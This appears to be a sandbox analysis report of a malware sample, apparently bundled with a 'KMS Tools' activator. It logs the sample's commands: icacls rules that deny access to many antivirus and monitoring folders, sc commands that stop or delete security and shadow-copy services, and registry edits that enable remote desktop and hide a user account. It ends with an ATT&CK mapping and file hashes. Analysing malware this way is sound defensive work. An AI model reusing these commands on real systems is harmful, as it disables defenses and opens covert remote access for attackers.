  [5] C:\Windows\system32\icacls.exe (PID 3936): icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 6028): C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5860): icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 4624): C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1136): icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 760): C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1356): icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 3944): C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4556): icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4772): C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
  [5] C:\Windows\system32\reg.exe (PID 3276): reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
      - Hide Artifacts: Hidden Users
[4] C:\Windows\system32\cmd.exe (PID 5052): C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  [5] C:\Windows\system32\reg.exe (PID 4424): reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
[4] C:\Windows\system32\cmd.exe (PID 4936): C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
  [5] C:\Windows\system32\reg.exe (PID 400): reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
      - Hide Artifacts: Hidden Users
[4] C:\Windows\system32\cmd.exe (PID 3068): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4056): icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 3468): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4052): icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 6056): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 3304): icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 1636): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 2868): icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 2516): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5976): icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 5428): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5988): icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 3104): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 2200): icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 1844): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1588): icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 3780): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4392): icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 2012): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4340): icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4780): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 3984): icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 1096): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5772): icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 1880): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4732): icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4984): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1324): icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 5860): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4136): icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4976): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4616): icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 3276): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4128): icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 1260): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4456): icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 1144): C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 572): icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 3324): C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 2056): icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 6032): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5436): icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 1384): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5952): icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 1228): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 3508): icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4104): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1140): icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 5732): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4272): icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 5768): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5904): icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 2404): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 2352): icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 3104): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1652): icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 416): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1344): icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 6016): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4888): icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 5532): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4476): icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 6080): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 476): icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 5668): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4612): icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 2568): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1756): icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 6084): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 2316): icacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 2564): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1324): icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 3488): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5912): icacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 5756): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4008): icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 2908): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 6024): icacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4128): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 2224): icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4456): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1144): icacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 5056): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5264): icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 868): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4920): icacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 3468): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4620): icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 3304): C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 2444): icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 3508): C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4104): icacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 848): C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 3240): icacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4568): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 2772): icacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 5968): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 3796): icacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 4824): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5168): icacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 1652): C:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4544): icacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 2776): C:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 6004): icacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 3280): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 3152): icacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 5588): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 6020): icacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4280): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 3984): icacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 5276): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 3192): icacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 5380): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 2752): icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 3488): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4684): icacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4796): C:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 3660): icacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 2908): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Wise" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1260): icacls "C:\Program Files (x86)\Wise" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 1056): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ReasonLabs" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1144): icacls "C:\Program Files\ReasonLabs" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 60): C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F
  [5] C:\Windows\system32\icacls.exe (PID 1576): icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F
[4] C:\Windows\system32\cmd.exe (PID 5264): C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F
  [5] C:\Windows\system32\icacls.exe (PID 1836): icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4920): C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F
  [5] C:\Windows\system32\icacls.exe (PID 3036): icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F
[4] C:\Windows\system32\cmd.exe (PID 4900): C:\Windows\system32\cmd.exe /c sc delete swprv
  [5] C:\Windows\system32\sc.exe (PID 5656): sc delete swprv
      - Launches sc.exe
[4] C:\Windows\system32\cmd.exe (PID 1564): C:\Windows\system32\cmd.exe /c sc stop mbamservice
  [5] C:\Windows\system32\sc.exe (PID 2516): sc stop mbamservice
      - Launches sc.exe
[4] C:\Windows\system32\cmd.exe (PID 4860): C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  [5] C:\Windows\system32\sc.exe (PID 5696): sc stop bytefenceservice
      - Launches sc.exe
[4] C:\Windows\system32\cmd.exe (PID 4372): C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  [5] C:\Windows\system32\sc.exe (PID 5876): sc delete bytefenceservice
      - Launches sc.exe
[4] C:\Windows\system32\cmd.exe (PID 4840): C:\Windows\system32\cmd.exe /c sc delete mbamservice
  [5] C:\Windows\system32\sc.exe (PID 2200): sc delete mbamservice
      - Launches sc.exe
[4] C:\Windows\system32\cmd.exe (PID 4344): C:\Windows\system32\cmd.exe /c sc delete crmsvc
  [5] C:\Windows\system32\sc.exe (PID 4884): sc delete crmsvc
      - Launches sc.exe
[4] C:\Windows\system32\cmd.exe (PID 4820): C:\Windows\system32\cmd.exe /c C:\Programdata\Install\Del3.bat
  [5] C:\Windows\system32\timeout.exe (PID 1808): timeout 5
      - Delays execution with timeout.exe
[1] C:\Windows\system32\AUDIODG.EXE (PID 1316): C:\Windows\system32\AUDIODG.EXE 0x510 0x514
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\NOTEPAD.EXE (PID 2264): "C:\Windows\system32\NOTEPAD.EXE" C:\KMS Tools Lite Portable\Programs\Office Installer+\readme.txt
[1] C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe (PID 4392): "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
[1] C:\Windows\system32\svchost.exe (PID 1712): C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
[1] C:\Windows\system32\svchost.exe (PID 4692): C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
[1] C:\Windows\system32\cmd.exe (PID 2936): C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
[1] C:\Windows\System32\svchost.exe (PID 1288): C:\Windows\System32\svchost.exe -k NetworkService -s TermService
[1] C:\Windows\System32\svchost.exe (PID 2116): C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\SysWOW64\unsecapp.exe (PID 5680): "C:\Windows\SysWOW64\unsecapp.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
[1] C:\ProgramData\Windows Tasks Service\winserv.exe (PID 3728): "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
[1] C:\ProgramData\Windows Tasks Service\winserv.exe (PID 3620): "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
[1] C:\Windows\SysWOW64\unsecapp.exe (PID 4424): "C:\Windows\SysWOW64\unsecapp.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
MITRE ATT&CK Enterprise v16

Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
- System Services (1)
  - Service Execution (1)

Persistence
- Account Manipulation (1)
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
- Server Software Component (1)
  - Terminal Services DLL (1)

Privilege Escalation
- Account Manipulation (1)
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)

Defense Evasion
- File and Directory Permissions Modification (1)
- Hide Artifacts (1)
  - Hidden Users (1)
- Impair Defenses (2)
  - Disable or Modify System Firewall (1)
- Modify Registry (2)
- Virtualization/Sandbox Evasion (1)
Downloads

- Filesize: 19.2MB
  MD5: c3c5adf650d5cf05bd1b08590d62cf53
  SHA1: 7781e1ecd78490ebaeb73314855efadff2bfeeed
  SHA256: ed63b2a33066ef63bdb5b99c40d660f29653386b334f45d5296ead6fbcbc2861
  SHA512: 79550a7f9afccc4ee58e8f74df80653d566ceb067e9ef57baa8aeff14ace2f8730d8cc22d0fad523bb36dc6736cb112cbc21ecfe6cb657c7cd2d483026b84249
- Filesize: 9.6MB
  MD5: a946712c1e450742997bf04899fa3ca9
  SHA1: f52e30a14e8b9cc72d11c238a5e9b9e4ca23c414
  SHA256: 7af2fb51e09719a29915b53e205e6587f8bed175babb69ca959838e336e24ac2
  SHA512: 62faf3120fc81cfd5ae5c96864a0222944d942956ee58e7d24aa1f21b3fbe2ceeeeeb500c3eb911fa5d793cb13e5283b4106db87707db4fd61b4a3b70fddfe51
- Filesize: 10KB
  MD5: 85e6b4a380b1d6aa72b6f1b74ae16b30
  SHA1: 1d76f8438499002ede014bd75134e6d95fd440d2
  SHA256: aa791c78f5f8a0da0417c73344c2d82a6105002622d08d5575ab2a7093902cf2
  SHA512: 81936e01f466cd02c87565b9599a9f37c1c576ea6c55ef2340bd26af202602c81a1b6f46a20ac90964a9b946f18c20066fb53d76ec35fa7a5e609ac1e8507244
- Filesize: 2.2MB
  MD5: dbfabf5db79b1f10d0190c241dfeda28
  SHA1: ce807ea14cbe3c6e2c1697dc6927944abb96c9f9
  SHA256: 57fe3d39c4c7d7c4b1753b57cdf32bc0d90cef36cc6286eecb39ec157da15560
  SHA512: a133a25fefd76730a12f6b35ca0707429d82b20f118a75326625a5ee2953222a1626ef4674681a42fde2724d1dd11a9a4ad5c8d5e4f1d799b0c6b8ab34b5c616
- Filesize: 19.0MB
